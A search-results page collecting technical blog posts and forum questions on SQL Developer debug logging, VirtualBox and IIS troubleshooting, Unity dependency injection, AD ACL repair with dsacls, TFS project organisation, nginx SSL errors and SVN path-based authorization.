Search Results

Search found 24720 results on 989 pages for 'path info'.

  • Using DEBUG Mode in Oracle SQL Developer to Log SQL

    - by thatjeffsmith
    Curious how we’re getting the data you see in SQL Developer when you click on something? While many of the dialogs provide a ‘SQL’ panel that shows you the SQL ABOUT to be generated, I’d rather see the SQL AS it’s executed. True, you could set a TRACE or fire up a Monitor Sessions report, but both of those solutions leave me hungry for more. Did you know that SQL Developer has a ‘debug’ mode? It slows the tool down a bit and spits out a lot of information you don’t care about, but it ALSO shows you ALL the SQL that is sent to the database, as you click around the tool! See ALL the SQL that SQL Developer sends to the database on your behalf.

    Enable DEBUG Mode
    When you see the splash screen as SQL Developer fires up, frantically hit Up, Up, Down, Down, Left, Right, Left, Right, B, A, SELECT, Start. Wait, wrong game. No, all you need to do is go to your SQL Developer directory and navigate down to the ‘bin’ directory. In that directory, find the ‘sqldeveloper.conf’ file:

        Install Directory
          - sqldeveloper
            - bin
              - sqldeveloper.conf

    Open it with a text editor. Find this line:

        IncludeConfFile sqldeveloper-nondebug.conf

    And replace it with this line:

        IncludeConfFile sqldeveloper-debug.conf

    Save the file. Start up SQL Developer.

    Observe the Logging Page – Log Panel for the SQL
    There’s going to be more than just SQL here. You’ll actually see a LOT of other information. If you’re having general problems with the tool and you want to see the nitty-gritty of what’s going on, then this is a good place to satisfy your curiosity, and it might help us diagnose your issue if you post to the forums or open a ticket with My Oracle Support. You’ll find ‘INFO’ entries such as the query used to populate your Tables list in the connection tree. You can double-click on the SQL text and get a pop-up window that’s much easier to read. See all that typing we’re saving you?

    I don’t recommend running in DEBUG mode all the time. Capturing this information and displaying it is more expensive than not doing so, and it provides a lot of information you don’t normally need to see. But when you DO want to know what’s going on and why, this is an excellent way of getting that information. When you’re ready to go back to ‘normal’ mode, just close SQL Developer, go back to your .conf file, and add the ‘nondebug’ bit back.
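    If you prefer the shell, here is a one-liner sketch of the same edit (Linux/OS X; substitute your own install path, which is an assumption here):

        cd /path/to/sqldeveloper/sqldeveloper/bin
        # keep a .bak copy, then swap the nondebug include for the debug one
        sed -i.bak 's/sqldeveloper-nondebug.conf/sqldeveloper-debug.conf/' sqldeveloper.conf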

    Read the article

  • [Visual Studio Extension Of The Day] Test Scribe for Visual Studio Ultimate 2010 and Test Professional 2010

    - by Hosam Kamel
    Test Scribe is a documentation power tool designed to construct documents directly from TFS test plan and test run artifacts, for the purpose of discussion, reporting, etc.
    Known Issues/Limitations:
    - Customizing the generated report by changing the template, adding comments, including attachments, etc. is not supported.
    - While opening a test plan summary document in Office 2007, if you get the warning “The file Test Plan Summary cannot be opened because there are problems with the contents” (with Details: ‘The file is corrupt and cannot be opened’), click ‘OK’, then click ‘Yes’ to recover the contents of the document. This will then open the document in Office 2007. The same problem is not found in Office 2010.
    - Generated documents are stored by default in the “My Documents” folder. The output path of the generated report cannot be modified.
    - Exporting Word documents for individual test suites or test cases in a test plan is not supported.
    Download it from Visual Studio Extension Manager. Originally posted at "Hosam Kamel | Developer & Platform Evangelist" http://blogs.msdn.com/hkamel

    Read the article

  • Ubuntu 13.10 install ISO crashes on VirtualBox Mac 4.3

    - by John Allsup
    Does anybody know what to do about this? Machine is a 2008 Core 2 Duo iMac with 4GB RAM. (And 64bit Debian 7 boots OK, but I've not tried installing under the latest version of VirtualBox as I have just upgraded VBox today.) VirtualBox 4.3, upon trying to boot a machine with the Ubuntu 13.10 (64bit) iso (with the VM configured for Ubuntu 64bit), crashes with the following information:

        Failed to open a session for the virtual machine Ubuntu64.
        The VM session was aborted.
        Result Code: NS_ERROR_FAILURE (0x80004005)
        Component: SessionMachine
        Interface: ISession {12f4dcdb-12b2-4ec1-b7cd-ddd9f6c5bf4d}

    The head of the crash dump is below:

        Process:         VirtualBoxVM [716]
        Path:            /Applications/VirtualBox.app/Contents/MacOS/VirtualBoxVM
        Identifier:      VirtualBoxVM
        Version:         ??? (???)
        Code Type:       X86 (Native)
        Parent Process:  VBoxSVC [644]
        Date/Time:       2013-10-17 22:58:23.679 +0100
        OS Version:      Mac OS X 10.6.8 (10K549)
        Report Version:  6
        Exception Type:  EXC_BAD_ACCESS (SIGBUS)
        Exception Codes: KERN_PROTECTION_FAILURE at 0x0000000000000040
        Crashed Thread:  0  Dispatch queue: com.apple.main-thread

        Thread 0 Crashed:  Dispatch queue: com.apple.main-thread
        0   com.apple.CoreFoundation        0x92a25c03 CFSetApplyFunction + 83
        1   com.apple.framework.IOKit       0x95557ad4 __IOHIDManagerInitialEnumCallback + 69
        2   com.apple.CoreFoundation        0x92a2442b __CFRunLoopDoSources0 + 1563
        3   com.apple.CoreFoundation        0x92a21eef __CFRunLoopRun + 1071
        4   com.apple.CoreFoundation        0x92a213c4 CFRunLoopRunSpecific + 452
        5   com.apple.CoreFoundation        0x92a211f1 CFRunLoopRunInMode + 97
        6   com.apple.HIToolbox             0x98eb5e04 RunCurrentEventLoopInMode + 392
        7   com.apple.HIToolbox             0x98eb5af5 ReceiveNextEventCommon + 158
        8   com.apple.HIToolbox             0x98eb5a3e BlockUntilNextEventMatchingListInMode + 81
        9   com.apple.AppKit                0x9971b595 _DPSNextEvent + 847
        10  com.apple.AppKit                0x9971add6 -[NSApplication nextEventMatchingMask:untilDate:inMode:dequeue:] + 156
        11  com.apple.AppKit                0x996dd1f3 -[NSApplication run] + 821
        12  QtGuiVBox                       0x019f19e1 QEventDispatcherMac::processEvents(QFlags<QEventLoop::ProcessEventsFlag>) + 1505
        13  QtCoreVBox                      0x018083b1 QEventLoop::processEvents(QFlags<QEventLoop::ProcessEventsFlag>) + 65
        14  QtCoreVBox                      0x018086fa QEventLoop::exec(QFlags<QEventLoop::ProcessEventsFlag>) + 170
        15  QtGuiVBox                       0x01eea9e5 QDialog::exec() + 261
        16  VirtualBox.dylib                0x011234b8 TrustedMain + 1108104
        17  VirtualBox.dylib                0x01126d68 TrustedMain + 1122616
        18  VirtualBox.dylib                0x010fac19 TrustedMain + 942057
        19  VirtualBox.dylib                0x010f9b3d TrustedMain + 937741
        20  VirtualBox.dylib                0x010f81dd TrustedMain + 931245
        21  VirtualBox.dylib                0x010f85b8 TrustedMain + 932232
        22  VirtualBox.dylib                0x0109d4f8 TrustedMain + 559304
        23  VirtualBox.dylib                0x0101521e TrustedMain + 1518
        24  ...virtualbox.app.VirtualBoxVM  0x00002e7e start + 2766
        25  ...virtualbox.app.VirtualBoxVM  0x000024b5 start + 261
        26  ...virtualbox.app.VirtualBoxVM  0x000023e5 start + 53

    And please somebody fix the code so that you can just delimit large blocks of code at the start and the end without indenting every line manually by 4 spaces.

    Read the article

  • 401 - Unauthorized On Server 2008 R2 IIS 7.5

    - by mxmissile
    I have a web application deployed to Server 2008 IIS 7.5 box. From remote it gives this error: 401 - Unauthorized: Access is denied due to invalid credentials. (remote = desktops on the same LAN) Have tried several remote clients using different browsers, all the same result. (IE, FF, and Chrome) Hitting the application from the desktop of the server itself works flawlessly. The application is using Anonymous Authentication. The application is written in .NET 4.0 Asp.Net using the MVC framework. Sysinternals procmon returns these 2 results for each request: FAST IO DISALLOWED and PATH NOT FOUND. I have 2 other MVC apps running fine on the same server. I have checked the security on the folders and they all match. App runs fine on a Server 2008 IIS 7.0 box. Nothing shows up in the Event log on the server related to this. Pulling my hair out here, any troubleshooting tips?

    Read the article

  • Dependency Injection in ASP.NET MVC NerdDinner App using Unity 2.0

    - by shiju
    In my previous post, Dependency Injection in ASP.NET MVC NerdDinner App using Ninject, we did dependency injection in the NerdDinner application using Ninject. In this post, I demonstrate how to apply Dependency Injection in the ASP.NET MVC NerdDinner App using Microsoft Unity Application Block (Unity) 2.0.

    Unity 2.0
    Unity 2.0 is available on CodePlex at http://unity.codeplex.com. The ObjectBuilder generic dependency injection mechanism, which in earlier versions of Unity was distributed as a separate assembly, is now integrated into the Unity core assembly, so you no longer need to reference the ObjectBuilder assembly in your applications. Two additional built-in lifetime managers, HierarchicalLifetimeManager and PerResolveLifetimeManager, have been added to Unity 2.0.

    Dependency Injection in NerdDinner using Unity
    In my Ninject post on NerdDinner, we discussed the interfaces and concrete types of the NerdDinner application and how to inject dependencies into controller constructors. The following steps will configure Unity 2.0 to apply controller injection in the NerdDinner application.

    Step 1 – Add a reference to the Unity Application Block
    Open the NerdDinner solution and add references to Microsoft.Practices.Unity.dll and Microsoft.Practices.Unity.Configuration.dll. You can download Unity from http://unity.codeplex.com.

    Step 2 – Controller factory for Unity
    The controller factory is responsible for creating controller instances. We extend the built-in default controller factory with our own factory for using Unity with ASP.NET MVC.

        public class UnityControllerFactory : DefaultControllerFactory
        {
            protected override IController GetControllerInstance(RequestContext reqContext, Type controllerType)
            {
                IController controller;
                if (controllerType == null)
                    throw new HttpException(
                            404, String.Format(
                                "The controller for path '{0}' could not be found " +
                                "or it does not implement IController.",
                                reqContext.HttpContext.Request.Path));
                if (!typeof(IController).IsAssignableFrom(controllerType))
                    throw new ArgumentException(
                            string.Format(
                                "Type requested is not a controller: {0}",
                                controllerType.Name),
                            "controllerType");
                try
                {
                    controller = MvcUnityContainer.Container.Resolve(controllerType)
                                    as IController;
                }
                catch (Exception ex)
                {
                    throw new InvalidOperationException(String.Format(
                                            "Error resolving controller {0}",
                                            controllerType.Name), ex);
                }
                return controller;
            }
        }

        public static class MvcUnityContainer
        {
            public static IUnityContainer Container { get; set; }
        }

    Step 3 – Register types and set the controller factory

        private void ConfigureUnity()
        {
            // Create the UnityContainer
            IUnityContainer container = new UnityContainer()
                .RegisterType<IFormsAuthentication, FormsAuthenticationService>()
                .RegisterType<IMembershipService, AccountMembershipService>()
                .RegisterInstance<MembershipProvider>(Membership.Provider)
                .RegisterType<IDinnerRepository, DinnerRepository>();
            // Set the container for the controller factory
            MvcUnityContainer.Container = container;
            // Set the controller factory to UnityControllerFactory
            ControllerBuilder.Current.SetControllerFactory(
                                typeof(UnityControllerFactory));
        }

    Unity 2.0 provides a fluent interface for type configuration, so you can now make all the registrations in a single statement. The Unity configuration in the ConfigureUnity method says: inject an instance of DinnerRepository when there is a request for IDinnerRepository, inject an instance of FormsAuthenticationService when there is a request for IFormsAuthentication, and inject an instance of AccountMembershipService when there is a request for IMembershipService. The AccountMembershipService class has a dependency on the ASP.NET membership provider, so we configure the container to inject the Membership.Provider instance. After registering the types, we set UnityControllerFactory as the current controller factory.

    When you register a type by using the RegisterType method, the default behavior is for the container to use a transient lifetime manager: it creates a new instance of the registered, mapped, or requested type each time you call the Resolve or ResolveAll method, or when the dependency mechanism injects instances into other classes. The following are the lifetime managers provided by Unity 2.0:
    - ContainerControlledLifetimeManager - Implements a singleton behavior for objects. The object is disposed of when you dispose of the container.
    - ExternallyControlledLifetimeManager - Implements a singleton behavior, but the container doesn't hold a reference to the object, which will be disposed of when out of scope.
    - HierarchicalLifetimeManager - Implements a singleton behavior for objects. However, child containers don't share instances with parents.
    - PerResolveLifetimeManager - Implements a behavior similar to the transient lifetime manager, except that instances are reused across build-ups of the object graph.
    - PerThreadLifetimeManager - Implements a singleton behavior for objects, but limited to the current thread.
    - TransientLifetimeManager - Returns a new instance of the requested type for each call. (default behavior)

    We can also create a custom lifetime manager for the Unity container. The following code creates a custom lifetime manager that stores instances in the current HttpContext.

        public class HttpContextLifetimeManager<T> : LifetimeManager, IDisposable
        {
            public override object GetValue()
            {
                return HttpContext.Current.Items[typeof(T).AssemblyQualifiedName];
            }
            public override void RemoveValue()
            {
                HttpContext.Current.Items.Remove(typeof(T).AssemblyQualifiedName);
            }
            public override void SetValue(object newValue)
            {
                HttpContext.Current.Items[typeof(T).AssemblyQualifiedName]
                    = newValue;
            }
            public void Dispose()
            {
                RemoveValue();
            }
        }

    Step 4 – Modify Global.asax.cs to configure the Unity container
    In the Application_Start event, we call the ConfigureUnity method to configure the Unity container and set the controller factory to UnityControllerFactory.

        void Application_Start()
        {
            RegisterRoutes(RouteTable.Routes);
            ViewEngines.Engines.Clear();
            ViewEngines.Engines.Add(new MobileCapableWebFormViewEngine());
            ConfigureUnity();
        }

    Download Code
    You can download the modified NerdDinner code from http://nerddinneraddons.codeplex.com

    Read the article

  • Modifying AD Schema permissions from the command line

    - by Ryan Roussel
    Recently while making some changes for a client, I accidentally dug myself into a pretty deep hole. I was trying to explicitly deny a certain user from reading a few group policies, including the Default Domain Policy. When I went in to make the change I accidentally denied Authenticated Users rather than the AD user object. This of course made the GPO inaccessible to all users, including any with domain admin rights. The policy could no longer be modified in the GPMC and, worse, changes could not be made through ADSIedit.

    The errors I was getting from inside ADSIedit when trying to edit the container looked like this:

        This object has one or more property sheets currently open.
        Invalid path to object

    The only solution was to strip Authenticated Users from the container ACL completely in the schema, then re-add it with the default read and apply rights. To perform this action, I used a command I had never used before: DSACLS.exe. It’s part of the DSMOD group of tools. Since this command interacts with the actual schema, you have to know the full LDAP container or object name. In this case, the GUID of the Default Domain Policy: {31B2F340-016D-11D2-945F-00C04FB984F9}

    The actual commands I ran looked like this. To display the current ACL of the container:

        c:\>dsacls "cn={31B2F340-016D-11D2-945F-00C04FB984F9},cn=Policies,cn=System,dc=domain,dc=com" /A

    To strip Authenticated Users from the ACL of the container:

        c:\>dsacls "cn={31B2F340-016D-11D2-945F-00C04FB984F9},cn=Policies,cn=System,dc=domain,dc=com" /R "NT Authority\Authenticated Users"

    For a full reference of the DSACLS.EXE command visit: http://support.microsoft.com/kb/281146

    Once Authenticated Users was cleared from the ACL, I was able to use the Group Policy Management Console to reassign the default permissions.
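    For completeness, the read side of the re-add can also be sketched from the same command line; this is a hedged sketch from memory, so verify the rights syntax against the KB article above before relying on it:

        c:\>dsacls "cn={31B2F340-016D-11D2-945F-00C04FB984F9},cn=Policies,cn=System,dc=domain,dc=com" /G "NT Authority\Authenticated Users":GR

    That grants generic read only; the "Apply Group Policy" right still has to be re-granted, which is exactly what reassigning the default permissions in GPMC does.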

    Read the article

  • Tomcat6 Manager Webapp is 404 on apt-get install on Ubuntu 10.10

    - by Noel
    http://localhost:8080/manager/html gives a 404 error on an apt-get install of tomcat6 (6.0.28 on JVM 1.6.0_20-b20 on 2.6.35-27-generic amd64). http://localhost:8080/host-manager/html works, and lists one Host name, localhost. Installed tomcat6-admin with apt-get.

        $ dpkg -l | grep -i tomcat6-admin
        ii tomcat6-admin 6.0.28-2ubuntu1.1 Servlet and JSP engine -- admin web applications

        $ cat /usr/share/tomcat6/conf/tomcat-users.xml
        <tomcat-users>
          <role rolename="admin"/>
          <role rolename="manager" />
          <user username="tomcatuser" password="Password1" roles="admin,manager"/>
        </tomcat-users>

        $ cat /usr/share/tomcat6/conf/Catalina/localhost/manager.xml
        <Context path="/manager" docBase="/usr/share/tomcat6-admin/manager"
            antiResourceLocking="false" privileged="true" />
        <role name="manager" />
        <user name="manager" password="Password1" roles="manager" />
        <user name="tomcatuser" password="Password1" roles="manager" />

    Those two files are the only documentation I've seen on how to set up the Manager webapp, and they seem to be compliant with the requirements.
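    Worth checking here, assuming the stock Ubuntu package layout: the live configuration directory for packaged tomcat6 is normally /etc/tomcat6 (with /var/lib/tomcat6 as CATALINA_BASE), so edits under /usr/share/tomcat6/conf may never be read; also, <role> and <user> elements belong in tomcat-users.xml, not in a <Context> file like manager.xml. A sketch of what to verify:

        # confirm where the running instance actually reads its config
        ls /etc/tomcat6/tomcat-users.xml /etc/tomcat6/Catalina/localhost/
        # restart after any change so the users file is re-read
        sudo service tomcat6 restart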

    Read the article

  • Nginx ssl - SSL: error:0906D06C:PEM routines:PEM_read_bio:no start line

    - by Alex
    I am trying to enable SSL on a server using a certificate from 123-reg but I keep getting this error:

        nginx: [emerg] SSL_CTX_use_certificate_chain_file("/opt/nginx/conf/cleantechlms.crt") failed
        (SSL: error:0906D06C:PEM routines:PEM_read_bio:no start line
        error:140DC009:SSL routines:SSL_CTX_use_certificate_chain_file:PEM lib)

    This is my nginx config:

        server {
            listen 443;
            server_name a-fake-url.com;
            root /file/path/public;
            passenger_enabled on;
            ssl on;
            ssl_certificate /opt/nginx/conf/cleantechlms.crt;
            ssl_certificate_key /opt/nginx/conf/cleantechlms.key;
        }

    I have tried setting my crt and key to full file permissions but there is no difference. My crt file is the crt I was issued concatenated with the CA crt.

    Update: I have tried copying both the keys into separate files and then running 'cat mykey.crt ca.cert'. I also tried manually copying the keys into the same file. Any ideas?
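    A "no start line" error from PEM_read_bio usually points at malformed PEM markers in the bundle, most often a missing newline between the issued certificate and the CA certificate after concatenation. A minimal sketch of rebuilding and checking the bundle (the input file names here are placeholders, not the asker's actual files):

        # server certificate first, then the 123-reg CA certificate
        cat issued.crt ca.crt > /opt/nginx/conf/cleantechlms.crt
        # every BEGIN marker must start on its own line; this should print
        # one intact line per certificate in the bundle
        grep -- "-----BEGIN CERTIFICATE-----" /opt/nginx/conf/cleantechlms.crt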

    Read the article

  • When should I use Areas in TFS instead of Team Projects

    - by Martin Hinshelwood
    Well, it depends… If you are a small company that creates a finite number of internal projects, then you will find it easier to create a single project for each of your products and have TFS do the heavy lifting with reporting, SharePoint sites and Version Control. But what if you are not…

    Update 9th March 2010: Michael Fourie gave me some feedback which I have integrated. Ed Blankenship via @edblankenship offered encouragement and a nice quote. Ewald Hofman gave me a couple of Cons, and maybe a few more soon. Ewald’s company, Avanade, currently uses Areas, but it looks like the manual management is getting too much and the project is getting cluttered.

    What if you are likely to have hundreds of projects, possibly with a multitude of internal and external projects? You might have 1 project for a customer or 10. This is the situation that most consultancies find themselves in, and thus they need a more sustainable and maintainable option. What I am advocating is that we should have one “Team Project” per customer, and use areas to create “sub projects” within that single “Team Project”.

    "What you describe is what we generally do internally and what we recommend. We make very heavy use of area path to categorize the work within a larger project." - Brian Harry, Microsoft Technical Fellow & Product Unit Manager for Team Foundation Server

    "We tend to use areas to segregate multiple projects in the same team project and it works well." - Tiago Pascoal, Visual Studio ALM MVP

    "In general, I believe this approach provides consistency [to multi-product engagements] and lowers the administration and maintenance costs. All good." - Michael Fourie, Visual Studio ALM MVP

    “@MrHinsh BTW, I'm very much a fan of very large, if not huge, team projects in TFS. Just FYI :) Use Areas & Iterations.” - Ed Blankenship, Visual Studio ALM MVP

    This would mean that SSW would have a single Team Project called “SSW” that contains all of our internal projects, and consequently all of the Areas and Iterations move down one level in the hierarchy to accommodate this. Where we would have had “\SSW\Sprint 1” we now have “\SSW\SqlDeploy\Sprint 1”, with “SqlDeploy” being our internal project. At the moment SSW has over 70 internal projects and more than 170 total projects in TFS. This method has long-term benefits that help to simplify the support model for companies that often have limited internal support time and many projects. But there are implications, as TFS does not provide this model “out-of-the-box”. These implications stretch across Areas, Iterations, Queries, Project Portal and Version Control.

    Michael made a good comment: "I agree with your approach, assuming that in a multi-product engagement with a client, they are happy to adopt the same process template across all products. If they are not, then it’ll either be easy to convince them or there is a valid reason for having a different template." - Michael Fourie, Visual Studio ALM MVP

    At SSW we have a standard template that we use, and this is applied across the board to all of our projects. We even apply any changes to the core process template to all of our existing projects as well. If you have multiple projects for the same clients on multiple templates and you want to keep it that way, then this approach will not work for you. However, if you want to standardise as we have at SSW, then this approach may benefit you as well.

    Implications around Areas
    Areas should be used for topological classification/isolation of work items. You can think of this as architecture areas, organisational areas or even the main features of your application. In our scenario there is an additional top-level item that represents the Project/Product that we want to chop our Team Project into. (Figure: Creating a sub area to represent a product/project is easy.)

        <teamproject>
        <teamproject>\<Functional Area/module whatever>

    Becomes:

        <teamproject>
        <teamproject>\<ProjectName>\
        <teamproject>\<ProjectName>\<Functional Area/module whatever>

    Implications around Iterations
    Iterations should be used for chronological classification/isolation of work items. This could include isolated time boxes, milestones or release timelines, and really depends on the logical flow of your project or projects. Due to the new level in Area we need to add the same level to Iteration. This is primarily because it is unlikely that the sprints in each of your projects/products will start and end at the same time. This is just a reality of managing multiple projects. (Figure: Adding the same Area value to Iteration as the top-level item adds flexibility to Iteration.)

        <teamproject>\Sprint 1
    Or
        <teamproject>\Release 1\Sprint 1

    Becomes:

        <teamproject>\<ProjectName>\Sprint 1
    Or
        <teamproject>\<ProjectName>\Release 1\Sprint 1

    Implications around Queries
    Queries are used to filter your work items based on a specified level of granularity. There are a number of queries that are built into a project created using the MSF Agile 5.0 template, but we now have multiple projects, and it would be a pain to have to edit all of the queries every time we changed project; that would only allow one team to work on one project at a time. (Figure: The queries that are created in a normal MSF Agile 5.0 project do not quite suit our new needs.)

    In order for project contributors to be able to query based on their project, we need a couple of things. The first thing I did was to create an “_Area Template” folder that has a copy of the project layout with all the queries set up to filter based on the “_Area Template” Area and the “_Sprint template” you can see in the Area and Iteration views. (Figure: The template is currently easy to drag and drop, but you then need to edit the queries to point at the right Area and Iteration. This needs a tool.)

    I then created an “Areas” folder to hold all of the area-specific queries. So, when you go to create a new TFS Sub-Project you just drag “_Area Template” while holding “Ctrl” and drop it onto “Areas”. There is a little setup here. That said, I managed it in around 10 minutes, which is not so bad, and I can imagine it being quite easy to build a tool to create these queries. (Figure: These new queries can be configured in around 10 minutes, which includes setting up the Area and Iteration as well.)

    Version Control
    What about your source code? Well, that is the easiest of the lot. Just create a sub folder for each of your projects/products. (Figure: Creating sub folders in source control is as easy as “Right click | Create new folder”.)

        <teamproject>\DEV\Main\

    Becomes:

        <teamproject>\<ProjectName>\DEV\Main\

    Conclusion
    I think it is up to each company to make a call on how you want to configure your Team Projects, and it depends completely on how many projects/products you are going to have for each customer, including yourself. If we decide to utilise this route it will require some configuration to get our 170+ projects into this format, and I will probably be writing some tools to help.

    Pros
    - You only have one project to upgrade when a process template changes – After going through an upgrade of over 170 projects prior to the changes in the RC, I can tell you that that many projects is no fun.
    - Standardises your Process Template – You will always have the same process implementation across projects/products without exception.
    - You get tighter control over the permissions – Yes, you can do this on a standard Team Project, but it gets a lot easier with practice.
    - You can “move” work items from one “product” to another – Have we not always wanted to do that?
    - You can rename your projects – Wahoo: everyone wants to do this, now you can.
    - One set of Reporting Services reports to manage – You set an area and iteration to run reports anyway, so you may as well set both.
    - Simplified check-in policies – There is only one set of check-in policies per client. This simplifies administration of policies.
    - Simplified alerts – As alerts are applied across multiple projects, this simplifies your alert rules per client.

    Cons
    All of these cons could be mitigated by a custom tool that helps automate creation of “sub-projects” within Team Projects. This custom tool could create areas, iterations, permissions, SharePoint and queries. It just does not exist yet :)
    - You need to configure the Areas and Iterations.
    - You need to configure the permissions.
    - You may need to configure sub sites for SharePoint (depends on your requirements) – If you have two projects/products in the same Team Project then you will not see the burndown for each one out-of-the-box, but rather a cumulative for the Team Project. This is not really that much of a problem, as you would have to configure your burndown graphs for your current iteration anyway. Note: when you create a sub site to a TFS-linked portal it will inherit the settings of its parent site :) This is fantastic, as it means that you can easily create sub sites and then set the Area and Iteration path in each of the reports to be the correct one.
    - Every team wants their own customization (via Ewald Hofman) – Small teams of 2 persons against teams of 30, or even outsourcing, need their own process; you cannot allow that, because everybody gets the same work item types. Note: luckily at SSW this is not a problem, as our template is standardised across all projects and customers.
    - Large list of builds (via Ewald Hofman) – As the build list in Team Explorer is just a flat list, it can get very cluttered. Note: I would mitigate this by removing any build that has not been run in over 30 days. The build template and workflow will still be available in version control, but it will clean the list.

    Feedback
    Now that I have explained this method, what do you think? What other pros and cons can you see? What do you think of this approach? Will you be using it? What tools would you like to support you?

    Technorati Tags: Visual Studio ALM, TFS Administration, TFS, Team Foundation Server, Project Planning, TFS Customisation

    Read the article

  • Using AuthzSVNAccessFile for controlling SVN Access produces HTTP 400 Bad Request

    - by meeper
    I have a new repository on an existing Subversion server that requires us to perform path-based authorization within the repository. I found that the AuthzSVNAccessFile directive in Apache is directly responsible for allowing this functionality. After fixing several other problems, such as AuthzSVNAccessFile preventing SVNListParentPath from operating properly, I am left with one single problem: I can checkout, I can update, I can commit, BUT I cannot execute an SVN COPY for performing branch/tagging operations. The moment I comment out the AuthzSVNAccessFile line in the Apache config, everything works as expected except the obvious path authorizations.

    Versions:
    - The server OS is Debian 6.0.7 (Squeeze)
    - Apache 2.2.16-6+squeeze11
    - Server Subversion 1.6.12dfsg-7
    - Clients are running Windows
    - Clients tried are: TortoiseSVN 1.8.2 Build 24708 64bit, SVN CLI Client 1.8.3 (r1516576)

    Authentication is performed via AD to a Windows 2003 domain and appears to be operating normally. I have stripped out all other configurations and repository setups to produce this single configuration that reproduces the problem.

    Apache configuration:

        <VirtualHost *:443>
            ServerName svn-test.company.com
            ServerAlias /svn-test
            ServerAdmin [email protected]
            SSLEngine On
            SSLCertificateFile /etc/apache2/apache.pem
            ErrorLog /var/log/apache2/svn-test_error.log
            LogLevel warn
            CustomLog /var/log/apache2/svn-test_access.log combined
            ServerSignature On
            # Repository Access to all Repositories
            <Location "/">
                DAV svn
                SVNParentPath /var/svn
                SVNListParentPath on
                AuthBasicProvider ldap
                AuthType Basic
                AuthzLDAPAuthoritative Off
                AuthName "Subversion Test Repository System"
                AuthLDAPURL "ldap://adserver.company.com:389/DC=corp,DC=company,DC=com?sAMAccountName?sub?(objectClass=*)" NONE
                AuthLDAPBindDN "CN=service_account,OU=ServiceIDs,OU=corp,OU=Delegated,DC=na,DC=corp,DC=company,DC=com"
                AuthLDAPBindPassword service_account_password
                Require valid-user
                SSLRequireSSL
            </Location>
            # <LocationMatch /.+> is a really dirty trick to make listing of repositories work
            # http://d.hatena.ne.jp/shimonoakio/20080130/1201686016
            <LocationMatch /.+>
                AuthzSVNAccessFile /etc/apache2/svn_path_auth
            </LocationMatch>
        </VirtualHost>

    SVN access file:

        [/]
        * = rw

    The repository used (AuthTestBasic) consists of the following directory structure and contains no externals (this is a literal listing, not an example):

        /
        /branches/
        /tags/
        /trunk/
        /trunk/somefile.txt

    Tortoise produces the following error during a tag operation in its tag result window:

        Adding directory failed: COPY on /authtestbasic/!svn/bc/2/trunk (400 Bad Request)

    The svn.exe CLI client produces the following error:

        C:\Users\e20epkt>svn copy https://servername/authtestbasic/trunk https://servername/authtestbasic/tags/tag1 -m "svn cli client"
        svn: E175002: Adding directory failed: COPY on /authtestbasic/!svn/bc/2/trunk (400 Bad Request)

    The Apache error log has nothing in it; however, the Apache access log has the following in it (IP addresses and usernames changed, obviously):

        10.1.2.100 - - [17/Oct/2013:11:53:40 -0700] "OPTIONS /authtestbasic/trunk HTTP/1.1" 401 2595 "-" "SVN/1.8.3 (x64-microsoft-windows) serf/1.3.1 TortoiseSVN-1.8.2.24708"
        10.1.2.100 - myuseraccount [17/Oct/2013:11:53:40 -0700] "OPTIONS /authtestbasic/trunk HTTP/1.1" 200 996 "-" "SVN/1.8.3 (x64-microsoft-windows) serf/1.3.1 TortoiseSVN-1.8.2.24708"
        10.1.2.100 - myuseraccount [17/Oct/2013:11:53:40 -0700] "OPTIONS /authtestbasic/trunk HTTP/1.1" 200 884 "-" "SVN/1.8.3 (x64-microsoft-windows) serf/1.3.1 TortoiseSVN-1.8.2.24708"
        10.1.2.100 - myuseraccount [17/Oct/2013:11:53:40 -0700] "PROPFIND /authtestbasic/trunk HTTP/1.1" 207 692 "-" "SVN/1.8.3 (x64-microsoft-windows) serf/1.3.1 TortoiseSVN-1.8.2.24708"
        10.1.2.100 - myuseraccount [17/Oct/2013:11:53:40 -0700] "PROPFIND /authtestbasic/!svn/vcc/default HTTP/1.1" 207 596 "-" "SVN/1.8.3 (x64-microsoft-windows) serf/1.3.1 TortoiseSVN-1.8.2.24708"
        10.1.2.100 - myuseraccount [17/Oct/2013:11:53:40 -0700] "REPORT /authtestbasic/!svn/bc/0/trunk HTTP/1.1" 404 580 "-" "SVN/1.8.3 (x64-microsoft-windows) serf/1.3.1 TortoiseSVN-1.8.2.24708"
        10.1.2.100 - myuseraccount [17/Oct/2013:11:53:40 -0700] "PROPFIND /authtestbasic/!svn/vcc/default HTTP/1.1" 207 596 "-" "SVN/1.8.3 (x64-microsoft-windows) serf/1.3.1 TortoiseSVN-1.8.2.24708"
        10.1.2.100 - myuseraccount [17/Oct/2013:11:53:40 -0700] "REPORT /authtestbasic/!svn/bc/2/trunk HTTP/1.1" 200 674 "-" "SVN/1.8.3 (x64-microsoft-windows) serf/1.3.1 TortoiseSVN-1.8.2.24708"
        10.1.2.100 - myuseraccount [17/Oct/2013:11:53:40 -0700] "PROPFIND /authtestbasic/!svn/bc/2/trunk HTTP/1.1" 207 548 "-" "SVN/1.8.3 (x64-microsoft-windows) serf/1.3.1 TortoiseSVN-1.8.2.24708"
        10.1.2.100 - myuseraccount [17/Oct/2013:11:53:40 -0700] "PROPFIND /authtestbasic/tags/tag1 HTTP/1.1" 404 580 "-" "SVN/1.8.3 (x64-microsoft-windows) serf/1.3.1 TortoiseSVN-1.8.2.24708"
        10.1.2.100 - myuseraccount [17/Oct/2013:11:53:40 -0700] "MKACTIVITY /authtestbasic/!svn/act/f1e9dc07-fb5e-5a41-ac22-907705ef6e5e HTTP/1.1" 201 708 "-" "SVN/1.8.3 (x64-microsoft-windows) serf/1.3.1 TortoiseSVN-1.8.2.24708"
        10.1.2.100 - myuseraccount [17/Oct/2013:11:53:40 -0700] "PROPFIND /authtestbasic/tags HTTP/1.1" 207 580 "-" "SVN/1.8.3 (x64-microsoft-windows) serf/1.3.1 TortoiseSVN-1.8.2.24708"
        10.1.2.100 - myuseraccount [17/Oct/2013:11:53:40 -0700] "CHECKOUT /authtestbasic/!svn/vcc/default HTTP/1.1" 201 708 "-" "SVN/1.8.3 (x64-microsoft-windows) serf/1.3.1 TortoiseSVN-1.8.2.24708"
        10.1.2.100 - myuseraccount [17/Oct/2013:11:53:40 -0700] "PROPPATCH /authtestbasic/!svn/wbl/f1e9dc07-fb5e-5a41-ac22-907705ef6e5e/2 HTTP/1.1" 207 596 "-" "SVN/1.8.3 (x64-microsoft-windows) serf/1.3.1 TortoiseSVN-1.8.2.24708"
